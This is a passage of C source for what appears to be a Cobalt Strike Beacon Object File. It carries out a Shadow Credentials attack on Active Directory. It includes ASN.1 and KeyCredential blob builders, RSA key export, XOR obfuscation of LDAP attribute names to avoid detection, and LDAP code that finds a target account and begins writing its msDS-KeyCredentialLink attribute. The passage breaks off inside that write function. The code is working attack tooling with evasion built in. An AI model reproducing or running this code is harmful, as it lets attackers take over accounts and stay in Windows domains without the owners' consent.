DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_value_free_len(struct berval**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_msgfree(LDAPMessage*);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_set_optionW(LDAP*, int, const void*);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_modify_sW(LDAP*, PWSTR, LDAPModW**);
DECLSPEC_IMPORT void WINAPI WLDAP32$ldap_memfreeW(PWSTR);

/* Kernel32 */
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FreeLibrary(HMODULE);
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT, DWORD, LPCCH, int, LPWSTR, int);
DECLSPEC_IMPORT int WINAPI KERNEL32$WideCharToMultiByte(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL);
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemTime(LPSYSTEMTIME);
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemTimeAsFileTime(LPFILETIME);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetComputerNameExW(int, LPWSTR, LPDWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SystemTimeToFileTime(const SYSTEMTIME*, LPFILETIME);

/* MSVCRT */
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void*);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void*, int, size_t);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void*, const void*, size_t);
DECLSPEC_IMPORT int __cdecl MSVCRT$memcmp(const void*, const void*, size_t);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char*);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$sprintf(char*, const char*, ...);
DECLSPEC_IMPORT int __cdecl MSVCRT$swprintf(wchar_t*, size_t, const wchar_t*, ...);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strchr(const char*, int);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscpy(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscat(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char*, const char*);
DECLSPEC_IMPORT int __cdecl MSVCRT$rand(void);
DECLSPEC_IMPORT void __cdecl MSVCRT$srand(unsigned int);
DECLSPEC_IMPORT time_t __cdecl MSVCRT$time(time_t*);

/* DFR macros */
#define WSAStartup WS2_32$WSAStartup
#define WSACleanup WS2_32$WSACleanup
#define socket WS2_32$socket
#define connect WS2_32$connect
#define send WS2_32$send
#define recv WS2_32$recv
#define closesocket WS2_32$closesocket
#define gethostbyname WS2_32$gethostbyname
#define inet_addr WS2_32$inet_addr
#define htons WS2_32$htons
#define htonl WS2_32$htonl
#define ntohl WS2_32$ntohl

#define CryptAcquireContextW ADVAPI32$CryptAcquireContextW
#define CryptReleaseContext ADVAPI32$CryptReleaseContext
#define CryptGenKey ADVAPI32$CryptGenKey
#define CryptDestroyKey ADVAPI32$CryptDestroyKey
#define CryptGenRandom ADVAPI32$CryptGenRandom
#define CryptCreateHash ADVAPI32$CryptCreateHash
#define CryptHashData ADVAPI32$CryptHashData
#define CryptGetHashParam ADVAPI32$CryptGetHashParam
#define CryptDestroyHash ADVAPI32$CryptDestroyHash
#define CryptExportKey ADVAPI32$CryptExportKey
#define ConvertSidToStringSidA ADVAPI32$ConvertSidToStringSidA
#define IsValidSid ADVAPI32$IsValidSid
#define GetLengthSid ADVAPI32$GetLengthSid

#define CryptEncodeObjectEx CRYPT32$CryptEncodeObjectEx
#define CryptDecodeObjectEx CRYPT32$CryptDecodeObjectEx
#define CryptBinaryToStringA CRYPT32$CryptBinaryToStringA
#define CryptStringToBinaryA CRYPT32$CryptStringToBinaryA
#define CertStrToNameA CRYPT32$CertStrToNameA
#define CertCreateCertificateContext CRYPT32$CertCreateCertificateContext
#define CertFreeCertificateContext CRYPT32$CertFreeCertificateContext
#define CertOpenStore CRYPT32$CertOpenStore
#define CertCloseStore CRYPT32$CertCloseStore
#define CertAddCertificateContextToStore CRYPT32$CertAddCertificateContextToStore
#define CertSetCertificateContextProperty CRYPT32$CertSetCertificateContextProperty
#define PFXExportCertStoreEx CRYPT32$PFXExportCertStoreEx
#define PFXImportCertStore CRYPT32$PFXImportCertStore
#define CertEnumCertificatesInStore CRYPT32$CertEnumCertificatesInStore
#define CryptAcquireCertificatePrivateKey CRYPT32$CryptAcquireCertificatePrivateKey
#define CryptExportPublicKeyInfo CRYPT32$CryptExportPublicKeyInfo
#define CryptSignAndEncodeCertificate CRYPT32$CryptSignAndEncodeCertificate
#define CryptMsgOpenToEncode CRYPT32$CryptMsgOpenToEncode
#define CryptMsgUpdate CRYPT32$CryptMsgUpdate
#define CryptMsgGetParam CRYPT32$CryptMsgGetParam
#define CryptMsgClose CRYPT32$CryptMsgClose

#define CoInitializeEx OLE32$CoInitializeEx
#define CoUninitialize OLE32$CoUninitialize
#define CoCreateGuid OLE32$CoCreateGuid

#define DsGetDcNameW NETAPI32$DsGetDcNameW
#define NetApiBufferFree NETAPI32$NetApiBufferFree

#define ldap_initW WLDAP32$ldap_initW
#define ldap_bind_sW WLDAP32$ldap_bind_sW
#define ldap_search_sW WLDAP32$ldap_search_sW
#define ldap_unbind WLDAP32$ldap_unbind
#define ldap_first_entry WLDAP32$ldap_first_entry
#define ldap_get_dnW WLDAP32$ldap_get_dnW
#define ldap_get_values_lenW WLDAP32$ldap_get_values_lenW
#define ldap_value_free_len WLDAP32$ldap_value_free_len
#define ldap_msgfree WLDAP32$ldap_msgfree
#define ldap_set_optionW WLDAP32$ldap_set_optionW
#define ldap_modify_sW WLDAP32$ldap_modify_sW
#define ldap_memfreeW WLDAP32$ldap_memfreeW

#define LocalAlloc KERNEL32$LocalAlloc
#define LocalFree KERNEL32$LocalFree
#define LoadLibraryA KERNEL32$LoadLibraryA
#define GetProcAddress KERNEL32$GetProcAddress
#define FreeLibrary KERNEL32$FreeLibrary
#define MultiByteToWideChar KERNEL32$MultiByteToWideChar
#define WideCharToMultiByte KERNEL32$WideCharToMultiByte
#define GetSystemTime KERNEL32$GetSystemTime
#define GetSystemTimeAsFileTime KERNEL32$GetSystemTimeAsFileTime
#define GetLastError KERNEL32$GetLastError
#define GetComputerNameExW KERNEL32$GetComputerNameExW
#define SystemTimeToFileTime KERNEL32$SystemTimeToFileTime

#define malloc MSVCRT$malloc
#define free MSVCRT$free
#define memset MSVCRT$memset
#define memcpy MSVCRT$memcpy
#define memcmp MSVCRT$memcmp
#define strlen MSVCRT$strlen
#define wcslen MSVCRT$wcslen
#define sprintf MSVCRT$sprintf
#define swprintf MSVCRT$swprintf
#define strcpy MSVCRT$strcpy
#define strcat MSVCRT$strcat
#define strchr MSVCRT$strchr
#define wcscpy MSVCRT$wcscpy
#define wcscat MSVCRT$wcscat
#define _stricmp MSVCRT$_stricmp
#define rand MSVCRT$rand
#define srand MSVCRT$srand
#define time MSVCRT$time

/*
 * =============================================================================
 * ASN.1/DER Encoding Functions
 * =============================================================================
 */

static int EncodeLength(BYTE* buf, int len) {
    if (len < 128) {
        buf[0] = (BYTE)len;
        return 1;
    }
    else if (len < 256) {
        buf[0] = 0x81;
        buf[1] = (BYTE)len;
        return 2;
    }
    else if (len < 65536) {
        buf[0] = 0x82;
        buf[1] = (BYTE)(len >> 8);
        buf[2] = (BYTE)(len & 0xFF);
        return 3;
    }
    else {
        buf[0] = 0x83;
        buf[1] = (BYTE)(len >> 16);
        buf[2] = (BYTE)((len >> 8) & 0xFF);
        buf[3] = (BYTE)(len & 0xFF);
        return 4;
    }
}

static int DecodeLength(BYTE* data, int offset, int* length) {
    if ((data[offset] & 0x80) == 0) {
        *length = data[offset];
        return 1;
    }
    else {
        int numBytes = data[offset] & 0x7F;
        int i;
        *length = 0;
        for (i = 1; i <= numBytes; i++) {
            *length = (*length << 8) | data[offset + i];
        }
        return 1 + numBytes;
    }
}

static BYTE* BuildSequence(BYTE* content, int contentLen, int* outLen) {
    int lenSize;
    BYTE lenBuf[4];
    BYTE* result;
    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x30;
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);
    return result;
}

static BYTE* BuildInteger(int value, int* outLen) {
    BYTE* result;
    if (value >= 0 && value < 128) {
        *outLen = 3;
        result = (BYTE*)malloc(3);
        result[0] = 0x02;
        result[1] = 0x01;
        result[2] = (BYTE)value;
    }
    else if (value >= 0 && value < 256) {
        *outLen = 4;
        result = (BYTE*)malloc(4);
        result[0] = 0x02;
        result[1] = 0x02;
        result[2] = 0x00;
        result[3] = (BYTE)value;
    }
    else {
        *outLen = 6;
        result = (BYTE*)malloc(6);
        result[0] = 0x02;
        result[1] = 0x04;
        result[2] = (BYTE)(value >> 24);
        result[3] = (BYTE)(value >> 16);
        result[4] = (BYTE)(value >> 8);
        result[5] = (BYTE)value;
    }
    return result;
}

static BYTE* BuildIntegerFromBytes(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    int needPadding = (data[0] & 0x80) ? 1 : 0;
    int totalDataLen = dataLen + needPadding;
    lenSize = EncodeLength(lenBuf, totalDataLen);
    *outLen = 1 + lenSize + totalDataLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x02;
    memcpy(result + 1, lenBuf, lenSize);
    if (needPadding) {
        result[1 + lenSize] = 0x00;
        memcpy(result + 2 + lenSize, data, dataLen);
    }
    else {
        memcpy(result + 1 + lenSize, data, dataLen);
    }
    return result;
}

static BYTE* BuildOctetString(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    lenSize = EncodeLength(lenBuf, dataLen);
    *outLen = 1 + lenSize + dataLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x04;
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, data, dataLen);
    return result;
}

static BYTE* BuildBitString(BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    lenSize = EncodeLength(lenBuf, dataLen + 1);
    *outLen = 1 + lenSize + 1 + dataLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x03;
    memcpy(result + 1, lenBuf, lenSize);
    result[1 + lenSize] = 0x00;
    memcpy(result + 2 + lenSize, data, dataLen);
    return result;
}

static BYTE* BuildContextTag(int tagNum, BYTE* content, int contentLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0xA0 | tagNum;
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);
    return result;
}

static BYTE* BuildApplication(int appNum, BYTE* content, int contentLen, int* outLen) {
    BYTE* result;
    int lenSize;
    BYTE lenBuf[4];
    lenSize = EncodeLength(lenBuf, contentLen);
    *outLen = 1 + lenSize + contentLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x60 | appNum;
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, content, contentLen);
    return result;
}

static BYTE* BuildGeneralString(const char* str, int* outLen) {
    int strLen = (int)strlen(str);
    int lenSize;
    BYTE lenBuf[4];
    BYTE* result;
    lenSize = EncodeLength(lenBuf, strLen);
    *outLen = 1 + lenSize + strLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x1B;
    memcpy(result + 1, lenBuf, lenSize);
    memcpy(result + 1 + lenSize, str, strLen);
    return result;
}

static BYTE* BuildGeneralizedTime(const char* timeStr, int* outLen) {
    int strLen = (int)strlen(timeStr);
    BYTE* result;
    *outLen = 2 + strLen;
    result = (BYTE*)malloc(*outLen);
    result[0] = 0x18;
    result[1] = (BYTE)strLen;
    memcpy(result + 2, timeStr, strLen);
    return result;
}

/*
 * =============================================================================
 * SHA-256 Hash Function
 * =============================================================================
 */

static BOOL ComputeSha256(BYTE* data, int dataLen, BYTE* hash) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    DWORD hashLen = 32;
    BOOL result = FALSE;

    if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        if (CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
            if (CryptHashData(hHash, data, dataLen, 0)) {
                if (CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
                    result = TRUE;
                }
            }
            CryptDestroyHash(hHash);
        }
        CryptReleaseContext(hProv, 0);
    }
    return result;
}

static void ComputeSha1(BYTE* data, int dataLen, BYTE* hash) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    DWORD hashLen = 20;
    if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
        if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
            CryptHashData(hHash, data, dataLen, 0);
            CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0);
            CryptDestroyHash(hHash);
        }
        CryptReleaseContext(hProv, 0);
    }
}

/*
 * =============================================================================
 * KeyCredential Blob Builder
 * =============================================================================
 */

static BYTE* BuildKeyCredentialEntry(BYTE identifier, BYTE* data, int dataLen, int* outLen) {
    BYTE* result;
    *outLen = 3 + dataLen;
    result = (BYTE*)malloc(*outLen);
    /* Length (2 bytes, little-endian) + Type (1 byte) + Data */
    result[0] = (BYTE)(dataLen & 0xFF);
    result[1] = (BYTE)((dataLen >> 8) & 0xFF);
    result[2] = identifier;
    memcpy(result + 3, data, dataLen);
    return result;
}

static BYTE* BuildKeyCredentialBlob(BYTE* publicKey, int publicKeyLen, GUID* deviceId, int* outLen) {
    BYTE* result;
    BYTE* binaryProperties;
    int bpLen = 0;
    BYTE keyId[32];
    BYTE keyHash[32];
    FILETIME ft;
    BYTE customKeyInfo[2] = { 0x01, 0x00 };  /* Version=1, Flags=0 */
    BYTE keyUsage[1] = { KEY_USAGE_NGC };
    BYTE keySource[1] = { KEY_SOURCE_AD };
    int offset;

    /* Build entries for hashing (all entries after KeyHash) */
    BYTE* keyMaterialEntry;
    BYTE* keyUsageEntry;
    BYTE* keySourceEntry;
    BYTE* deviceIdEntry;
    BYTE* customKeyInfoEntry;
    BYTE* lastLogonEntry;
    BYTE* creationEntry;
    int kmLen, kuLen, ksLen, diLen, ckiLen, llLen, ctLen;

    GetSystemTimeAsFileTime(&ft);
    BYTE fileTimeBytes[8];
    memcpy(fileTimeBytes, &ft, 8);

    keyMaterialEntry = BuildKeyCredentialEntry(KCEI_KEYMATERIAL, publicKey, publicKeyLen, &kmLen);
    keyUsageEntry = BuildKeyCredentialEntry(KCEI_KEYUSAGE, keyUsage, 1, &kuLen);
    keySourceEntry = BuildKeyCredentialEntry(KCEI_KEYSOURCE, keySource, 1, &ksLen);
    deviceIdEntry = BuildKeyCredentialEntry(KCEI_DEVICEID, (BYTE*)deviceId, 16, &diLen);
    customKeyInfoEntry = BuildKeyCredentialEntry(KCEI_CUSTOMKEYINFO, customKeyInfo, 2, &ckiLen);
    lastLogonEntry = BuildKeyCredentialEntry(KCEI_KEYLASTLOGON, fileTimeBytes, 8, &llLen);
    creationEntry = BuildKeyCredentialEntry(KCEI_KEYCREATION, fileTimeBytes, 8, &ctLen);

    /* Concatenate all entries for hash */
    bpLen = kmLen + kuLen + ksLen + diLen + ckiLen + llLen + ctLen;
    binaryProperties = (BYTE*)malloc(bpLen);
    offset = 0;
    memcpy(binaryProperties + offset, keyMaterialEntry, kmLen); offset += kmLen;
    memcpy(binaryProperties + offset, keyUsageEntry, kuLen); offset += kuLen;
    memcpy(binaryProperties + offset, keySourceEntry, ksLen); offset += ksLen;
    memcpy(binaryProperties + offset, deviceIdEntry, diLen); offset += diLen;
    memcpy(binaryProperties + offset, customKeyInfoEntry, ckiLen); offset += ckiLen;
    memcpy(binaryProperties + offset, lastLogonEntry, llLen); offset += llLen;
    memcpy(binaryProperties + offset, creationEntry, ctLen); offset += ctLen;

    /* KeyID = SHA256(publicKey) */
    ComputeSha256(publicKey, publicKeyLen, keyId);

    /* KeyHash = SHA256(binaryProperties) */
    ComputeSha256(binaryProperties, bpLen, keyHash);

    /* Build final blob: Version + KeyID + KeyHash + binaryProperties */
    BYTE* keyIdEntry;
    BYTE* keyHashEntry;
    int kiLen, khLen;

    keyIdEntry = BuildKeyCredentialEntry(KCEI_KEYID, keyId, 32, &kiLen);
    keyHashEntry = BuildKeyCredentialEntry(KCEI_KEYHASH, keyHash, 32, &khLen);

    *outLen = 4 + kiLen + khLen + bpLen;
    result = (BYTE*)malloc(*outLen);

    /* Version 0x200 (little-endian) */
    result[0] = 0x00;
    result[1] = 0x02;
    result[2] = 0x00;
    result[3] = 0x00;

    offset = 4;
    memcpy(result + offset, keyIdEntry, kiLen); offset += kiLen;
    memcpy(result + offset, keyHashEntry, khLen); offset += khLen;
    memcpy(result + offset, binaryProperties, bpLen);

    /* Cleanup */
    free(keyMaterialEntry);
    free(keyUsageEntry);
    free(keySourceEntry);
    free(deviceIdEntry);
    free(customKeyInfoEntry);
    free(lastLogonEntry);
    free(creationEntry);
    free(keyIdEntry);
    free(keyHashEntry);
    free(binaryProperties);

    return result;
}

/*
 * =============================================================================
 * RSA Key Export in BCRYPT_RSAKEY_BLOB Format
 * =============================================================================
 */

static BYTE* ExportRSAPublicKeyBCrypt(HCRYPTKEY hKey, int* outLen) {
    BYTE* pubKeyBlob = NULL;
    DWORD pubKeyBlobLen = 0;
    BYTE* bcryptBlob = NULL;

    /* Export in PUBLICKEYBLOB format */
    if (!CryptExportKey(hKey, 0, PUBLICKEYBLOB, 0, NULL, &pubKeyBlobLen)) {
        return NULL;
    }

    pubKeyBlob = (BYTE*)malloc(pubKeyBlobLen);
    if (!CryptExportKey(hKey, 0, PUBLICKEYBLOB, 0, pubKeyBlob, &pubKeyBlobLen)) {
        free(pubKeyBlob);
        return NULL;
    }

    /* PUBLICKEYBLOB format:
     * BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes) + modulus (bitlen/8 bytes)
     * RSAPUBKEY: magic (4) + bitlen (4) + pubexp (4)
     */
    DWORD bitLen = *(DWORD*)(pubKeyBlob + 12);
    DWORD modulusLen = bitLen / 8;
    DWORD exponent = *(DWORD*)(pubKeyBlob + 16);
    BYTE* modulus = pubKeyBlob + 20;

    /* Build BCRYPT_RSAKEY_BLOB */
    /* BCRYPT_RSAKEY_BLOB: Magic(4) + BitLength(4) + cbPublicExp(4) + cbModulus(4) + cbPrime1(4) + cbPrime2(4) + Exponent + Modulus */
    int expLen = 3;  /* exponent 65537 = 0x010001 = 3 bytes */
    *outLen = 24 + expLen + modulusLen;
    bcryptBlob = (BYTE*)malloc(*outLen);

    *(DWORD*)(bcryptBlob + 0) = BCRYPT_RSAPUBLIC_MAGIC;
    *(DWORD*)(bcryptBlob + 4) = bitLen;
    *(DWORD*)(bcryptBlob + 8) = expLen;
    *(DWORD*)(bcryptBlob + 12) = modulusLen;
    *(DWORD*)(bcryptBlob + 16) = 0;  /* cbPrime1 */
    *(DWORD*)(bcryptBlob + 20) = 0;  /* cbPrime2 */

    /* Exponent (big-endian) */
    bcryptBlob[24] = 0x01;
    bcryptBlob[25] = 0x00;
    bcryptBlob[26] = 0x01;

    /* Modulus - need to reverse because CryptoAPI exports little-endian but BCRYPT expects big-endian */
    int i;
    for (i = 0; i < (int)modulusLen; i++) {
        bcryptBlob[27 + i] = modulus[modulusLen - 1 - i];
    }

    free(pubKeyBlob);
    return bcryptBlob;
}

/*
 * =============================================================================
 * String Obfuscation - XOR deobfuscation at runtime
 * =============================================================================
 */

#define XOR_KEY 0x5A

 /* Deobfuscate XOR'd wide string in-place */
static void DeobfuscateW(WCHAR* str, int len) {
    int i;
    for (i = 0; i < len; i++) {
        str[i] ^= XOR_KEY;
    }
}

/* Deobfuscate XOR'd byte string in-place */
static void DeobfuscateA(char* str, int len) {
    int i;
    for (i = 0; i < len; i++) {
        str[i] ^= XOR_KEY;
    }
}

/* Build obfuscated LDAP attribute names at runtime */
static void GetObfuscatedStrings(WCHAR* samAccountName, WCHAR* distinguishedName,
    WCHAR* objectSid, WCHAR* keyCredLink) {
    /* "sAMAccountName" XOR 0x5A */
    /* s=0x29 A=0x1B M=0x17 A=0x1B c=0x39 c=0x39 o=0x35 u=0x2F n=0x34 t=0x2E N=0x14 a=0x3B m=0x37 e=0x3F */
    WCHAR sam[] = { 0x29, 0x1B, 0x17, 0x1B, 0x39, 0x39, 0x35, 0x2F, 0x34, 0x2E,
                    0x14, 0x3B, 0x37, 0x3F, 0x00 };
    /* "distinguishedName" XOR 0x5A */
    /* d=0x3E i=0x33 s=0x29 t=0x2E i=0x33 n=0x34 g=0x3D u=0x2F i=0x33 s=0x29 h=0x32 e=0x3F d=0x3E N=0x14 a=0x3B m=0x37 e=0x3F */
    WCHAR dn[] = { 0x3E, 0x33, 0x29, 0x2E, 0x33, 0x34, 0x3D, 0x2F, 0x33, 0x29,
                   0x32, 0x3F, 0x3E, 0x14, 0x3B, 0x37, 0x3F, 0x00 };
    /* "objectSid" XOR 0x5A */
    /* o=0x35 b=0x38 j=0x30 e=0x3F c=0x39 t=0x2E S=0x09 i=0x33 d=0x3E */
    WCHAR sid[] = { 0x35, 0x38, 0x30, 0x3F, 0x39, 0x2E, 0x09, 0x33, 0x3E, 0x00 };
    /* "msDS-KeyCredentialLink" XOR 0x5A */
    /* m=0x37 s=0x29 D=0x1E S=0x09 -=0x77 K=0x11 e=0x3F y=0x23 C=0x19 r=0x28 e=0x3F d=0x3E e=0x3F n=0x34 t=0x2E i=0x33 a=0x3B l=0x36 L=0x16 i=0x33 n=0x34 k=0x31 */
    WCHAR kcl[] = { 0x37, 0x29, 0x1E, 0x09, 0x77, 0x11, 0x3F, 0x23, 0x19, 0x28,
                    0x3F, 0x3E, 0x3F, 0x34, 0x2E, 0x33, 0x3B, 0x36, 0x16, 0x33,
                    0x34, 0x31, 0x00 };

    wcscpy(samAccountName, sam);
    DeobfuscateW(samAccountName, 14);

    wcscpy(distinguishedName, dn);
    DeobfuscateW(distinguishedName, 17);

    wcscpy(objectSid, sid);
    DeobfuscateW(objectSid, 9);

    wcscpy(keyCredLink, kcl);
    DeobfuscateW(keyCredLink, 22);
}

/*
 * =============================================================================
 * LDAP Functions - Search for target and write attribute
 * =============================================================================
 */

static BOOL LookupUserDNAndSID(const char* szTarget, const char* szDomain,
    WCHAR* wszTargetDN, int dnLen, BYTE** ppSid, DWORD* pdwSidLen) {
    LDAP* pLdap = NULL;
    LDAPMessage* pResults = NULL;
    LDAPMessage* pEntry = NULL;
    struct berval** ppValues = NULL;
    WCHAR* wszDomain = NULL;
    WCHAR* wszBaseDN = NULL;
    WCHAR* wszFilter = NULL;
    WCHAR* wszTarget = NULL;
    WCHAR wszSamAccountName[32];
    WCHAR wszDistinguishedName[32];
    WCHAR wszObjectSid[16];
    WCHAR wszKeyCredLink[32];
    WCHAR* attrs[3];

    /* Deobfuscate attribute names */
    GetObfuscatedStrings(wszSamAccountName, wszDistinguishedName, wszObjectSid, wszKeyCredLink);
    attrs[0] = wszDistinguishedName;
    attrs[1] = wszObjectSid;
    attrs[2] = NULL;
    ULONG ulResult;
    BOOL bSuccess = FALSE;
    ULONG ulOff = 0;

    *ppSid = NULL;
    *pdwSidLen = 0;
    wszTargetDN[0] = L'\0';

    wszDomain = (WCHAR*)malloc(256 * sizeof(WCHAR));
    wszBaseDN = (WCHAR*)malloc(512 * sizeof(WCHAR));
    wszFilter = (WCHAR*)malloc(512 * sizeof(WCHAR));
    wszTarget = (WCHAR*)malloc(256 * sizeof(WCHAR));

    if (!wszDomain || !wszBaseDN || !wszFilter || !wszTarget) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to allocate memory");
        goto cleanup;
    }

    memset(wszDomain, 0, 256 * sizeof(WCHAR));
    memset(wszBaseDN, 0, 512 * sizeof(WCHAR));
    memset(wszFilter, 0, 512 * sizeof(WCHAR));
    memset(wszTarget, 0, 256 * sizeof(WCHAR));

    MultiByteToWideChar(CP_UTF8, 0, szDomain, -1, wszDomain, 256);
    MultiByteToWideChar(CP_UTF8, 0, szTarget, -1, wszTarget, 256);

    /* Build base DN from domain */
    {
        WCHAR* pSrc = wszDomain;
        WCHAR* pDst = wszBaseDN;
        WCHAR* pSegStart = pSrc;
        while (*pSrc) {
            if (*pSrc == L'.') {
                wcscpy(pDst, L"DC=");
                pDst += 3;
                while (pSegStart < pSrc) *pDst++ = *pSegStart++;
                *pDst++ = L',';
                pSegStart = pSrc + 1;
            }
            pSrc++;
        }
        wcscpy(pDst, L"DC=");
        pDst += 3;
        while (*pSegStart) *pDst++ = *pSegStart++;
        *pDst = L'\0';
    }

    pLdap = ldap_initW(wszDomain, LDAP_PORT);
    if (!pLdap) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_init failed");
        goto cleanup;
    }

    ulOff = 0;
    ldap_set_optionW(pLdap, LDAP_OPT_REFERRALS, &ulOff);

    ulResult = ldap_bind_sW(pLdap, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    if (ulResult != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_bind_s failed: %u", ulResult);
        ldap_unbind(pLdap);
        goto cleanup;
    }

    /* Search by sAMAccountName (using deobfuscated string) */
    SWPRINTF(wszFilter, L"(%s=%s)", wszSamAccountName, wszTarget);
    ulResult = ldap_search_sW(pLdap, wszBaseDN, LDAP_SCOPE_SUBTREE, wszFilter, attrs, 0, &pResults);
    if (ulResult != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_search_s failed: %u", ulResult);
        ldap_unbind(pLdap);
        goto cleanup;
    }

    pEntry = ldap_first_entry(pLdap, pResults);
    if (!pEntry) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Target not found: %s (search returned 0 results)", szTarget);
        ldap_msgfree(pResults);
        ldap_unbind(pLdap);
        goto cleanup;
    }

    /* Get DN */
    PWSTR dn = ldap_get_dnW(pLdap, pEntry);
    if (dn) {
        wcscpy(wszTargetDN, dn);
        ldap_memfreeW(dn);
    }

    /* Get SID (using deobfuscated attribute name) */
    ppValues = ldap_get_values_lenW(pLdap, pEntry, wszObjectSid);
    if (ppValues && ppValues[0] && ppValues[0]->bv_len > 0) {
        if (IsValidSid((PSID)ppValues[0]->bv_val)) {
            DWORD dwSidLen = GetLengthSid((PSID)ppValues[0]->bv_val);
            *ppSid = (BYTE*)malloc(dwSidLen);
            if (*ppSid) {
                memcpy(*ppSid, ppValues[0]->bv_val, dwSidLen);
                *pdwSidLen = dwSidLen;
            }
        }
        ldap_value_free_len(ppValues);
    }

    ldap_msgfree(pResults);
    ldap_unbind(pLdap);
    bSuccess = TRUE;

cleanup:
    if (wszDomain) free(wszDomain);
    if (wszBaseDN) free(wszBaseDN);
    if (wszFilter) free(wszFilter);
    if (wszTarget) free(wszTarget);
    return bSuccess;
}

static BOOL WriteKeyCredentialLink(const char* szDomain, WCHAR* wszTargetDN, BYTE* keyCredBlob, int blobLen) {
    LDAP* pLdap = NULL;
    WCHAR* wszDomain = NULL;
    LDAPModW* mods[2];
    LDAPModW mod;
    ULONG ulResult;
    BOOL bSuccess = FALSE;
    ULONG ulOff = 0;
    WCHAR wszSamAccountName[32];
    WCHAR wszDistinguishedName[32];
    WCHAR wszObjectSid[16];
    WCHAR wszKeyCredLink[32];

    /* Deobfuscate attribute name */
    GetObfuscatedStrings(wszSamAccountName, wszDistinguishedName, wszObjectSid, wszKeyCredLink);

    wszDomain = (WCHAR*)malloc(256 * sizeof(WCHAR));
    if (!wszDomain) return FALSE;

    MultiByteToWideChar(CP_UTF8, 0, szDomain, -1, wszDomain, 256);

    pLdap = ldap_initW(wszDomain, LDAP_PORT);
    if (!pLdap) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_init failed for write");
        free(wszDomain);
        return FALSE;
    }

    ulOff = 0;
    ldap_set_optionW(pLdap, LDAP_OPT_REFERRALS, &ulOff);

    ulResult = ldap_bind_sW(pLdap, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    if (ulResult != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] ldap_bind_s failed for write: %u", ulResult);
        ldap_unbind(pLdap);
        free(wszDomain);
        return FALSE;
    }

    /* Prepare modification - attribute is a DNWithBinary type */
    /* Format: B:<hex_length>:<hex_blob>:<DN> */
    int hexLen = blobLen * 2;
